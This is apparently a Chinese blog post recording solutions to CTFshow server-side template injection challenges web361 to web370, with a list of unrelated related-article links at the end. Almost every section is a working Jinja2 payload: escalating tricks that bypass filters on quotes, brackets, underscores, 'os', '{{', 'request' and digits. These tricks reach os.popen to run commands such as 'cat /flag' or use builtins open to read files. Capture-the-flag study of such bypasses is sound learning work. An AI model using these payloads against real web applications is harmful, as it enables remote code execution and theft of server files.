【Web】Ctfshow SSTI刷题记录1

目录

[①web361 362-无过滤](#①web361 362-无过滤)

②web363-过滤单双引号

③web364-过滤单双引号和args

④web365-过滤中括号[]、单双引号、args

⑤web366-过滤单双引号、args、中括号[]、下划线

⑦web367-过滤单双引号、args、中括号[]、下划线、os

⑧web368-过滤单双引号、args、中括号[]、下划线、os、{{

⑨web369-过滤单双引号、args、中括号[]、下划线、os、{{、request

⑩web370-过滤单双引号、args、中括号[]、下划线、os、{{、request、数字


①web361 362-无过滤

题目给到Hint,尝试传?name={{1-1}}测试出ssti注入点

掏出武器库秒了(上文有总结)

?name={{url_for.globals['builtins']['eval']("import('os').popen('tac /f*').read()")}}

或者

?name={{url_for.globals.os.popen('tac /f*').read()}}

②web363-过滤单双引号

?a=os&b=popen&c=cat /flag&name={{url_for.globals[request.args.a][request.args.b](request.args.c).read()}}

或者

?a=tac /f*&name={{url_for.globals.os.popen(request.args.a).read()}}

③web364-过滤单双引号和args

?a=os&b=popen&c=cat /flag&name={{url_for.globals[request.values.a][request.values.b](request.values.c).read()}}

或者

?a=tac /f*&name={{url_for.globals.os.popen(request.values.a).read()}}

④web365-过滤中括号[]、单双引号、args

?c=cat /flag&name={{url_for.globals.os.popen(request.values.c).read()}}

⑤web366-过滤单双引号、args、中括号[]、下划线

?name={{(lipsum|attr(request.cookies.a)).os.popen(request.cookies.b).read()}}

Cookie:a=globals;b=cat /flag

⑦web367-过滤单双引号、args、中括号[]、下划线、os

?name={{(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}&a=globals&b=os&c=cat /flag

⑧web368-过滤单双引号、args、中括号[]、下划线、os、{{

使用{%%}绕过,再借助print()回显

?a=globals&b=os&c=cat /flag&name={% print(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read() %}

⑨web369-过滤单双引号、args、中括号[]、下划线、os、{{、request

?name=

{% set po=dict(po=a,p=a)|join%}

{% set a=(()|select|string|list)|attr(po)(24)%}

{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}

{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}

{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}

{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}

{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}

{% set chr=x.chr%}

{% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}

{%print(x.open(file).read())%}

⑩web370-过滤单双引号、args、中括号[]、下划线、os、{{、request、数字

?name=

{% set c=(dict(e=a)|join|count)%}

{% set cc=(dict(ee=a)|join|count)%}

{% set ccc=(dict(eee=a)|join|count)%}

{% set cccc=(dict(eeee=a)|join|count)%}

{% set ccccccc=(dict(eeeeeee=a)|join|count)%}

{% set cccccccc=(dict(eeeeeeee=a)|join|count)%}

{% set ccccccccc=(dict(eeeeeeeee=a)|join|count)%}

{% set cccccccccc=(dict(eeeeeeeeee=a)|join|count)%}

{% set coun=(cc~cccc)|int%}

{% set po=dict(po=a,p=a)|join%}

{% set a=(()|select|string|list)|attr(po)(coun)%}

{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}

{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}

{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}

{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}

{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}

{% set chr=x.chr%}

{% set file=chr((cccc~ccccccc)|int)%2bchr((cccccccccc~cc)|int)%2bchr((cccccccccc~cccccccc)|int)%2bchr((ccccccccc~ccccccc)|int)%2bchr((cccccccccc~ccc)|int)%}

{%print(x.open(file).read())%}

相关推荐
wu~97014 分钟前
web服务器有哪些?服务器和web服务器有什么区别
运维·服务器·前端
FIN666818 分钟前
募投绘蓝图-昂瑞微的成长密码与未来布局
前端·后端·5g·云原生·信息与通信·射频工程·芯片
cooldream200941 分钟前
深度解析中秋节HTML5动画的实现
前端·html·html5
能工智人小辰1 小时前
Coordinate Attention for Efficient Mobile Network Design 学习笔记
笔记·学习·php
驱动开发0073 小时前
虚拟摄像头VirtualUSB UVC CAMERA下载 支持将手机摄像头映射成PC端摄像头
驱动开发·安全·电脑
jump_jump3 小时前
超长定时器 long-timeout
前端·javascript·node.js
程序员三明治3 小时前
HTTPS 真的牢不可破吗?—— 中间人攻击与安全机制解析
网络协议·安全·https
xian_wwq4 小时前
【学习笔记】边缘智能(Edge Intelligence):如何实现“就地决策”的方法
笔记·学习·边缘智能
我登哥MVP4 小时前
HTML-CSS-JS-入门学习笔记
javascript·css·笔记·学习·html
Mintopia4 小时前
架构进阶 🏗 从 CRUD 升级到“大工程师视野”
前端·javascript·全栈